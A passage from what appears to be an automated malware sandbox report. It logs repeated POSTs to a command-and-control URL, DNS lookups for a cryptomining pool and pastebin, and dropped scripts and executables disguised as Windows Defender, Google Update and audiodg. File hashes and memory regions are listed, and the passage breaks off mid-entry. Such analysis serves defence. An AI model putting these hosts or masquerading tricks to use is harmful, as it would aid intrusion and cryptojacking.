                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200
                                                                                                        • 104.21.9.141:80
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          http
                                                                                                          smss.exe
                                                                                                          7.0kB
                                                                                                          3.5kB
                                                                                                          14
                                                                                                          14

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200
                                                                                                        • 8.8.8.8:53
                                                                                                          pool.hashvault.pro
                                                                                                          dns
                                                                                                          dialer.exe
                                                                                                          64 B
                                                                                                          80 B
                                                                                                          1
                                                                                                          1

                                                                                                          DNS Request

                                                                                                          pool.hashvault.pro

                                                                                                          DNS Response

                                                                                                          95.179.241.203

                                                                                                        • 8.8.8.8:53
                                                                                                          pastebin.com
                                                                                                          dns
                                                                                                          dialer.exe
                                                                                                          58 B
                                                                                                          106 B
                                                                                                          1
                                                                                                          1

                                                                                                          DNS Request

                                                                                                          pastebin.com

                                                                                                          DNS Response

                                                                                                          104.20.3.235
                                                                                                          104.20.4.235
                                                                                                          172.67.19.24

                                                                                                        • 8.8.8.8:53
                                                                                                          uffyaa.ru
                                                                                                          dns
                                                                                                          smss.exe
                                                                                                          55 B
                                                                                                          87 B
                                                                                                          1
                                                                                                          1

                                                                                                          DNS Request

                                                                                                          uffyaa.ru

                                                                                                          DNS Response

                                                                                                          104.21.9.141
                                                                                                          172.67.160.132

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RES162F.tmp

                                                                                                          Filesize

                                                                                                          1KB

                                                                                                          MD5

                                                                                                          a924317a1450bbcb00063ffa6d39343c

                                                                                                          SHA1

                                                                                                          ab398208544399713e35e7a3c3ff5fb541e8178a

                                                                                                          SHA256

                                                                                                          8c4577a243ad8171c51dbd1315f6558f468e0e9d04dbb04d995be74e01c7371d

                                                                                                          SHA512

                                                                                                          f897b4d80dd1a0aa58c7ea35cda47603e249fff3e8c4addd947e13a774b7aa840142e3c11f7384d5e195160be2292c2286af3197b761dbcfbc0d146fcde9dc69

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jKkZYzVQ86.bat

                                                                                                          Filesize

                                                                                                          156B

                                                                                                          MD5

                                                                                                          a30b6c1b984899fd1c4ad7eaecd0003e

                                                                                                          SHA1

                                                                                                          983a32e3e2c6fa35acaccd7aad531fd198458bec

                                                                                                          SHA256

                                                                                                          47f2c3e88f61dbeff6933837956e47234b4d4eaad1b25d2f8e3d387712e908cc

                                                                                                          SHA512

                                                                                                          389148af72c59611acf0f6660581116cbaf099f9c27acbf4fd5ff264511017c2748cf693afa2c5bb28ebf17c0465abf28eefa514ac6be13317786220b7c17e54

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          d2671ba08b977c3b89f8f3a61344891c

                                                                                                          SHA1

                                                                                                          12c5c70eb792a39f94baa608d2986c00e32ae0e3

                                                                                                          SHA256

                                                                                                          ae8e4b1f7b55fcc3b158b50c802ef41dca4b6a3935171eb1cb72847390903da3

                                                                                                          SHA512

                                                                                                          e9dfbb4763bd3827542df79a9dff5dbf373051477388f96411fe79e828f973c835ebb963df98f5b5f96c75eed3b95498c358ea60d1d0ae1091b81f8aa47dcca3

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          0b8ab07c584b7388ccd84b08c59ac564

                                                                                                          SHA1

                                                                                                          8f66cb157dd5148c6f42bc88054ebf27e2f28b2a

                                                                                                          SHA256

                                                                                                          d68d43576640675822812b0c1c7a66c3ea8f2a0b071e1d61497c13656a284c5e

                                                                                                          SHA512

                                                                                                          90166d39677cccd26ca6e27540ea024f198c88bdac1b131793472c6789f949622b2b92a07cdb51d3e93f5b9da4be3708d29e8e4d1958deb6ad4cd8f82272a0b5

                                                                                                        • C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

                                                                                                          Filesize

                                                                                                          3KB

                                                                                                          MD5

                                                                                                          1ce9b896804736500e1759d62716265e

                                                                                                          SHA1

                                                                                                          1b4eef95c4b70debc5f45f2e92d73246c249ca3b

                                                                                                          SHA256

                                                                                                          868ec01e0d846666099f529a392714fb4d9eb63bd32b3cb1cda5b9b07e08a62c

                                                                                                          SHA512

                                                                                                          0d4d7a7ed74b6eaa581848b7c55f1901701401f8c0f0398c142d2abe0329ef6499063bd8e9eb46f2939d10c903a1747d1fd0509e3067d499c174fed61a90ebf4

                                                                                                        • C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

                                                                                                          Filesize

                                                                                                          3KB

                                                                                                          MD5

                                                                                                          879de7b6905fdec6cc51e90281f62f83

                                                                                                          SHA1

                                                                                                          fcd1e3fe5de1222feee2dfcc12f3855822e4b121

                                                                                                          SHA256

                                                                                                          acf273898880f7fd6a579fac217933d15dc525a9dce5f68c5544a8d924a6b910

                                                                                                          SHA512

                                                                                                          e51a3ccabf1df80db5a0269c341eed9438f4774e061f91ff74f6a0ed84322e1fe9f32110bd1c451d918845c3b6df048a6884dd3d9fc2f3837f6ef3b51bd42a55

                                                                                                        • C:\Windows\System32\Tasks\audiodg

                                                                                                          Filesize

                                                                                                          3KB

                                                                                                          MD5

                                                                                                          9eef140b23f8f36b92157e0f6f654fba

                                                                                                          SHA1

                                                                                                          4f31a9edb04521e09b7b916847b171660604dc80

                                                                                                          SHA256

                                                                                                          dc31b182f56a63c166ad991251730055f5f3fe914d8761c1d46f3fb40ba57fde

                                                                                                          SHA512

                                                                                                          6192f1150545876ebae8b0baf9cfa89bebd20b3561a14fb904cbe30ca02d07e80f2a3da02eb907422b539c6ae02bbe953188235d05b1e9bb6ec461048a78fe25

                                                                                                        • C:\Windows\System32\perfc007.dat

                                                                                                          Filesize

                                                                                                          145KB

                                                                                                          MD5

                                                                                                          19c7052de3b7281b4c1c6bfbb543c5dc

                                                                                                          SHA1

                                                                                                          d2e12081a14c1069c89f2cee7357a559c27786e7

                                                                                                          SHA256

                                                                                                          14ed6cb3198e80964cbc687a60aed24fb68d1bbd7588f983dc1fc6ae63514b4a

                                                                                                          SHA512

                                                                                                          289ca791909882c857014bd24e777fa84b533896508b562051b529d4c27e0d98bc41c801c6384b382f5dc0fa584dc8f713939c636543b0a5cf5ea2b396300f83

                                                                                                        • C:\Windows\System32\perfc00A.dat

                                                                                                          Filesize

                                                                                                          154KB

                                                                                                          MD5

                                                                                                          f0ecfbfa3e3e59fd02197018f7e9cb84

                                                                                                          SHA1

                                                                                                          961e9367a4ef3a189466c0a0a186faf8958bdbc4

                                                                                                          SHA256

                                                                                                          cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324

                                                                                                          SHA512

                                                                                                          116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294

                                                                                                        • C:\Windows\System32\perfc00C.dat

                                                                                                          Filesize

                                                                                                          145KB

                                                                                                          MD5

                                                                                                          ce233fa5dc5adcb87a5185617a0ff6ac

                                                                                                          SHA1

                                                                                                          2e2747284b1204d3ab08733a29fdbabdf8dc55b9

                                                                                                          SHA256

                                                                                                          68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31

                                                                                                          SHA512

                                                                                                          1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

                                                                                                        • C:\Windows\System32\perfc010.dat

                                                                                                          Filesize

                                                                                                          142KB

                                                                                                          MD5

                                                                                                          d73172c6cb697755f87cd047c474cf91

                                                                                                          SHA1

                                                                                                          abc5c7194abe32885a170ca666b7cce8251ac1d6

                                                                                                          SHA256

                                                                                                          9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57

                                                                                                          SHA512

                                                                                                          7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

                                                                                                        • C:\Windows\System32\perfc011.dat

                                                                                                          Filesize

                                                                                                          118KB

                                                                                                          MD5

                                                                                                          045b3a28859ed815f97e17fcebadf523

                                                                                                          SHA1

                                                                                                          a3cfaf297b3ef6d2e7ae0e33b9e7a3f212c7c5bd

                                                                                                          SHA256

                                                                                                          690ebf33940e7d22aeef120d30cc8b1731b2b18ce0cb4b2db89679735809312c

                                                                                                          SHA512

                                                                                                          d1836a85871c5c11efc407827bb87af4356297a8c498310de45cb322827082622c56cccee7d22c2e2a2f6894a33589534b9f516736005107571d7efade1e9de5

                                                                                                        • C:\Windows\System32\perfh007.dat

                                                                                                          Filesize

                                                                                                          680KB

                                                                                                          MD5

                                                                                                          b69ab3aeddb720d6ef8c05ff88c23b38

                                                                                                          SHA1

                                                                                                          d830c2155159656ed1806c7c66cae2a54a2441fa

                                                                                                          SHA256

                                                                                                          24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625

                                                                                                          SHA512

                                                                                                          4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d

                                                                                                        • C:\Windows\System32\perfh009.dat

                                                                                                          Filesize

                                                                                                          646KB

                                                                                                          MD5

                                                                                                          aecab86cc5c705d7a036cba758c1d7b0

                                                                                                          SHA1

                                                                                                          e88cf81fd282d91c7fc0efae13c13c55f4857b5e

                                                                                                          SHA256

                                                                                                          9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066

                                                                                                          SHA512

                                                                                                          e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8

                                                                                                        • C:\Windows\System32\perfh00A.dat

                                                                                                          Filesize

                                                                                                          727KB

                                                                                                          MD5

                                                                                                          7d0bac4e796872daa3f6dc82c57f4ca8

                                                                                                          SHA1

                                                                                                          b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a

                                                                                                          SHA256

                                                                                                          ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879

                                                                                                          SHA512

                                                                                                          145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

                                                                                                        • C:\Windows\System32\perfh00C.dat

                                                                                                          Filesize

                                                                                                          727KB

                                                                                                          MD5

                                                                                                          5f684ce126de17a7d4433ed2494c5ca9

                                                                                                          SHA1

                                                                                                          ce1a30a477daa1bac2ec358ce58731429eafe911

                                                                                                          SHA256

                                                                                                          2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c

                                                                                                          SHA512

                                                                                                          4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

                                                                                                        • C:\Windows\System32\perfh010.dat

                                                                                                          Filesize

                                                                                                          722KB

                                                                                                          MD5

                                                                                                          4623482c106cf6cc1bac198f31787b65

                                                                                                          SHA1

                                                                                                          5abb0decf7b42ef5daf7db012a742311932f6dad

                                                                                                          SHA256

                                                                                                          eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349

                                                                                                          SHA512

                                                                                                          afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

                                                                                                        • C:\Windows\System32\perfh011.dat

                                                                                                          Filesize

                                                                                                          406KB

                                                                                                          MD5

                                                                                                          54c674d19c0ff72816402f66f6c3d37c

                                                                                                          SHA1

                                                                                                          2dcc0269545a213648d59dc84916d9ec2d62a138

                                                                                                          SHA256

                                                                                                          646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5

                                                                                                          SHA512

                                                                                                          4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

                                                                                                        • C:\Windows\System32\wbem\Performance\WmiApRpl.h

                                                                                                          Filesize

                                                                                                          3KB

                                                                                                          MD5

                                                                                                          b133a676d139032a27de3d9619e70091

                                                                                                          SHA1

                                                                                                          1248aa89938a13640252a79113930ede2f26f1fa

                                                                                                          SHA256

                                                                                                          ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

                                                                                                          SHA512

                                                                                                          c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

                                                                                                        • C:\Windows\System32\wbem\Performance\WmiApRpl.ini

                                                                                                          Filesize

                                                                                                          27KB

                                                                                                          MD5

                                                                                                          46d08e3a55f007c523ac64dce6dcf478

                                                                                                          SHA1

                                                                                                          62edf88697e98d43f32090a2197bead7e7244245

                                                                                                          SHA256

                                                                                                          5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614

                                                                                                          SHA512

                                                                                                          b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

                                                                                                        • C:\Windows\system32\perfc009.dat

                                                                                                          Filesize

                                                                                                          118KB

                                                                                                          MD5

                                                                                                          b6a40d83e0fd90f0c9ba062102a8eb99

                                                                                                          SHA1

                                                                                                          d5b564584ea2b5eab4ddda1a225594d790cc585b

                                                                                                          SHA256

                                                                                                          0efde37b0dfcd63a634f9448fdfdfb9c689e7f28accaa063e7abfe5747c7a054

                                                                                                          SHA512

                                                                                                          7b4d6e842ce0433e965eb923f3359634494a735368a04832d85e5778c3a9590144e1c7cc0f336ac9a1208215838433dfb6ff5837c8494231989e3164c10d3f2c

                                                                                                        • C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat

                                                                                                          Filesize

                                                                                                          79B

                                                                                                          MD5

                                                                                                          06def1a66d18e2cb54c3feb3e338e852

                                                                                                          SHA1

                                                                                                          deea78d6baf993c87a4be23895c0ac97be3a58e5

                                                                                                          SHA256

                                                                                                          050561c2a9a611410c1194e5dea95982410c21c13e6a1b55d0df5c19fb4d3d2f

                                                                                                          SHA512

                                                                                                          a3769d9af6fdf50c8a86707cf6ced77673e7c7d0471c8102777adf5a556e9ee1598941596fd6acd198c84e7900205a67503209e95e9a4f8ea7f139014e8ba93f

                                                                                                        • C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe

                                                                                                          Filesize

                                                                                                          238B

                                                                                                          MD5

                                                                                                          c40860c6355fad694d0759ae23dd3439

                                                                                                          SHA1

                                                                                                          eb61967cd1502160c1e2e219690cf0b7f91cc94e

                                                                                                          SHA256

                                                                                                          b4c7379240810d664b2bdd60e093b4203134eff9c42de2720b0cd287af1d74ca

                                                                                                          SHA512

                                                                                                          ca5323cf17932235cce0c83bc82efa25dd88c0c181b1cddc82149690531d26a0c948ec4d33435ccdf95cc1884efe163703df878ecc30ccc90ecd85083d4d4dfc

                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\yuqn5vbi\yuqn5vbi.0.cs

                                                                                                          Filesize

                                                                                                          403B

                                                                                                          MD5

                                                                                                          3777703456bf642ebbbda430dc04f284

                                                                                                          SHA1

                                                                                                          8a3d6e684d29fe49790a7bea5e81c6c263386f55

                                                                                                          SHA256

                                                                                                          d53e176640871e36d2b1eadf65bfde6e8cd16a78acaa5a59db067d12803fe182

                                                                                                          SHA512

                                                                                                          7f83eb103096a72e9009ffd9d1707cb9945afb1b57f620aa30fcc6bbc8db4e1cbceca8295015955bcf572704ece7177d9c6774f4ed3586fbc8c3e7fe23dbb4ec

                                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\yuqn5vbi\yuqn5vbi.cmdline

                                                                                                          Filesize

                                                                                                          235B

                                                                                                          MD5

                                                                                                          6252238a88ce5f6648cbfa3375885008

                                                                                                          SHA1

                                                                                                          d56d5b485247ed23bcd0757747ec6f16664f58be

                                                                                                          SHA256

                                                                                                          f568147610093ea8f13518502def5d95b3722a9d60c1b1a2c55589f2b8d0771c

                                                                                                          SHA512

                                                                                                          ad66c37ba114a9faf409057e036efee45a9cde6217539a5456f4b24358fa97443b9efc4edeab728eea3985a8c2c6bebe8dab4892b9739a92f757a9255f6e20c8

                                                                                                        • \??\c:\Windows\System32\CSC7D2F785B976C42AAA316FD7FCBF052.TMP

                                                                                                          Filesize

                                                                                                          1KB

                                                                                                          MD5

                                                                                                          70046c6c63d509bb29450ef32b59dda3

                                                                                                          SHA1

                                                                                                          26802b73997ee22a7cd3d07ae77016969603cf00

                                                                                                          SHA256

                                                                                                          dd0e7409cd9412eafdd8f881d6094fb539ad19c7a54d76043de655a00f80f5d0

                                                                                                          SHA512

                                                                                                          d7b8d4ed84b8e1f5e416c378872bb7bc6d884341f0aa76f2c3b664f1ad0324a2d749c51718f3940d61663d152c35ba241ce0def03a002c6423a4d0957866c96f

                                                                                                        • \Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe

                                                                                                          Filesize

                                                                                                          1.8MB

                                                                                                          MD5

                                                                                                          5c218a3293314b8e13e89212d24e7da0

                                                                                                          SHA1

                                                                                                          9ff5c504f253730e1d6a15ca1c655c3882ecfbae

                                                                                                          SHA256

                                                                                                          aedfa77790fe7a60cffddc7dfd4afa0f6fdb858965df2850ce418b4428d92a99

                                                                                                          SHA512

                                                                                                          4985f19581a8fc670dde876199a1603fcb1ece427b8c0544b9cf369568fc81ee81a4e2f1a3cbf7160b87a8590917b9b4c8dc8268c5d3ce988c3a251ece047f44

                                                                                                        • \Users\Admin\AppData\Local\Temp\twain32.exe

                                                                                                          Filesize

                                                                                                          5.7MB

                                                                                                          MD5

                                                                                                          de40bff13376524593bbf365ac4489f2

                                                                                                          SHA1

                                                                                                          19178234bd0e35a984ff183418fc2f39c48b4e8d

                                                                                                          SHA256

                                                                                                          bafc17e2573f25344dbd7e27703f8e91b2abde15ac01a932bd3f12e686ab7952

                                                                                                          SHA512

                                                                                                          957fcc33adead5af1e5919251976c863b519f3097f21d1abf909cea136fe0b8ad7e8c15696a409d212d471c3b4d899cd021e7194fbcc4c6445b220383653016b

                                                                                                        • \fontwin\MsServerHost.exe

                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                          MD5

                                                                                                          6a720688eb9d2f5c2cfd4761f969063b

                                                                                                          SHA1

                                                                                                          5ee46b7fd8f41c79e3df31feede20c518307d52a

                                                                                                          SHA256

                                                                                                          7be4d5853d99295ba22450e935a9ab99861cfbe5ecc56dab500161c5fa6a8d8b

                                                                                                          SHA512

                                                                                                          8a9bee8056817fdd26f41202ceae21c4dd720b20de699f28ec6dbbf70ad6566f4ed394d34cbe640374cf970ccb4f4746fe416f2c7bdec19864305c9878d489c0

                                                                                                        • memory/432-31-0x0000000000270000-0x0000000000291000-memory.dmp

                                                                                                          Filesize

                                                                                                          132KB

                                                                                                        • memory/432-73-0x000007FEBEE60000-0x000007FEBEE70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/432-33-0x0000000000270000-0x0000000000291000-memory.dmp

                                                                                                          Filesize

                                                                                                          132KB

                                                                                                        • memory/432-70-0x00000000002A0000-0x00000000002C7000-memory.dmp

                                                                                                          Filesize

                                                                                                          156KB

                                                                                                        • memory/432-74-0x0000000036D30000-0x0000000036D40000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/480-81-0x000007FEBEE60000-0x000007FEBEE70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/480-78-0x0000000000150000-0x0000000000177000-memory.dmp

                                                                                                          Filesize

                                                                                                          156KB

                                                                                                        • memory/480-83-0x0000000036D30000-0x0000000036D40000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/496-86-0x0000000000200000-0x0000000000227000-memory.dmp

                                                                                                          Filesize

                                                                                                          156KB

                                                                                                        • memory/496-88-0x000007FEBEE60000-0x000007FEBEE70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/496-90-0x0000000036D30000-0x0000000036D40000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/684-80-0x0000000036D30000-0x0000000036D40000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/684-79-0x000007FEBEE60000-0x000007FEBEE70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/684-77-0x00000000001B0000-0x00000000001D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          156KB

                                                                                                        • memory/964-89-0x0000000036D30000-0x0000000036D40000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/964-87-0x000007FEBEE60000-0x000007FEBEE70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/964-85-0x0000000000E90000-0x0000000000EB7000-memory.dmp

                                                                                                          Filesize

                                                                                                          156KB

                                                                                                        • memory/1752-1320-0x0000000001E40000-0x0000000001E48000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1752-1311-0x000000001B7B0000-0x000000001BA92000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/2156-1801-0x0000000000920000-0x0000000000B18000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/2340-378-0x000000001A070000-0x000000001A352000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/2340-379-0x0000000000950000-0x0000000000958000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2692-30-0x0000000076AD0000-0x0000000076BEF000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.1MB

                                                                                                        • memory/2692-29-0x0000000076CF0000-0x0000000076E99000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.7MB

                                                                                                        • memory/2700-200-0x000000001B640000-0x000000001B922000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/2700-201-0x0000000001E80000-0x0000000001E88000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2924-1537-0x00000000FF490000-0x00000000FF4E7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                        • memory/2924-1768-0x00000000FF490000-0x00000000FF4E7000-memory.dmp

                                                                                                          Filesize

                                                                                                          348KB

                                                                                                        • memory/2948-27-0x0000000002040000-0x0000000002048000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2948-26-0x000000001B530000-0x000000001B812000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/3040-823-0x0000000000F30000-0x0000000001128000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/3040-829-0x0000000000500000-0x000000000050E000-memory.dmp

                                                                                                          Filesize

                                                                                                          56KB

                                                                                                        • memory/3040-839-0x0000000000570000-0x000000000057E000-memory.dmp

                                                                                                          Filesize

                                                                                                          56KB

                                                                                                        • memory/3040-841-0x0000000000580000-0x000000000058C000-memory.dmp

                                                                                                          Filesize

                                                                                                          48KB

                                                                                                        • memory/3040-837-0x0000000000520000-0x000000000052C000-memory.dmp

                                                                                                          Filesize

